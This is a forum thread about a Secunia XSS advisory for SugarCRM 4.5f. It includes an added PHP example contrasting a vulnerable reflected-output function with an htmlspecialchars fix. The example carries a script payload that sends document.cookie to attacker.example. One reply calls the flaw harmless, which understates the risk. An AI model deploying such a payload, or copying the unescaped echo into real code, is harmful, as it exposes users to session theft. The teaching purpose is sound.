Secunia are reporting "SugarCRM Sugar Open Source Cross-Site Scripting Vulnerability"
In 4.5f
Apologies if this is old news ... searched on vulnerabilities and secunia
Has this been fixed in 4.5g?
http://secunia.com/advisories/23424/
Hi,
This exploit is a good example of one of these "theoretical" exploits that are "maybe" possible but only under rather unrealistic conditions. I think that in real life this is not a security issue at all.
Sugar is not Ebay.
For Ebay such exploits are interesting as Ebay is one website and everybody uses it.
So you can send out millions of emails containing fake/prepared links to ebay.com and wait for a few people to fall for it.
To use such an exploit with Sugar you would need to directly target single people of which you know what Sugar install they are using, on which machine, etc. These are very rare conditions.
I would not worry about this exploit.
I think that someone sending you an email with a link to his Sugar install and asking you to log in (so that he knows your password) is more risky.
Cheers
Gunnar
Gunnar von Boehn
myCRMspace
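For readers who want to see what the "prepared link" attack in the post above actually looks like, here is an added example; it is not SugarCRM code and not the flaw from the Secunia advisory (the advisory does not say which parameter or page is affected), just the generic reflected XSS pattern in PHP, the language Sugar is written in. The page name `search.php`, the parameter `q` and the attacker domain are hypothetical.

```php
<?php
// Added example: generic reflected XSS and its fix (hypothetical page, not Sugar code).

// Vulnerable: the query parameter is echoed straight into the HTML response.
// A link such as http://victim.example/search.php?q=<script>...</script>
// makes the victim's browser run the attacker's script in the app's origin.
function render_search_vulnerable(string $q): string {
    return "<p>Results for: " . $q . "</p>";
}

// Hardened: HTML-encode untrusted input before placing it in an HTML text context.
// ENT_QUOTES also encodes ' and " so the same helper is safe inside attribute values.
function render_search_fixed(string $q): string {
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Results for: " . $safe . "</p>";
}

// Constructed attacker input, the payload such a prepared link would carry.
$payload = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

echo render_search_vulnerable($payload), "\n"; // <script> tag lands in the page as markup
echo render_search_fixed($payload), "\n";      // rendered as inert text: &lt;script&gt;...
```

The second function is what a fix for this class of bug looks like: the check that matters is not on the way in (input filtering) but at the point where the untrusted string meets the HTML output. Note that `htmlspecialchars` is only correct for HTML text and attribute contexts; data inserted into a `<script>` block or a URL needs a different encoding.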
As noted in the advisory itself, this was fixed in 4.5.0g.
Thanks for passing this along.
Andy
Andy Dreisch
Vice President, Online Team